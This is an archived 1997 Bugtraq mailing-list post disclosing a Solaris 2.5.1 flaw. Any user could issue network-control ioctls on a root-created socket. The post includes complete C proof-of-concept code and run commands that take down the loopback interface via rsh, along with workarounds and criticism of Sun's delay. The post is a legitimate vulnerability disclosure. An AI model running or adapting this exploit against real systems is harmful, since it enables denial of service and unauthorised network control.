[4736] in bugtraq
Solaris 2.5.1 party piece
daemon@ATHENA.MIT.EDU (Alan Cox)
Thu Jun 19 20:04:59 1997
Date: Thu, 19 Jun 1997 15:27:39 +0100
Reply-To: Alan Cox <alan@LXORGUK.UKUU.ORG.UK>
From: Alan Cox <alan@LXORGUK.UKUU.ORG.UK>
X-To: bugtraq@crimelab.com
To: BUGTRAQ@NETSPACE.ORG
Well CERT have had this for a year, AUSCERT for a couple of weeks and
now its time bugtraq had it
cc solarisuck.c -o solarisuck -lsocket
rsh localhost ./solarisuck
solarisuck.c
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/sockio.h>
#include <net/if.h>
#include <netinet/in.h>
int main(int argc, char *argv[])
{
struct ifreq please_break_me;
strcpy( please_break_me.ifr_name, "lo0");
please_break_me.ifr_flags=0;
if(ioctl(0, SIOCSIFFLAGS, &please_break_me)==-1)
perror("Damn it didnt work. Obviously not Solaris ;)");
}
You can adjust this to do other things. Basically any user can do network control
requests on a root created socket descriptor.
Workarounds:
1. Disable rsh and any non root owned inetd tasks - breaks remote tar etc
2. Run an OS that the vendor doesnt take a year to fix bugs in
I have the original emails from Sun folks (Casper Dik, Alec Muffett and co)
to prove Sun have sat on this for ages.
Alan
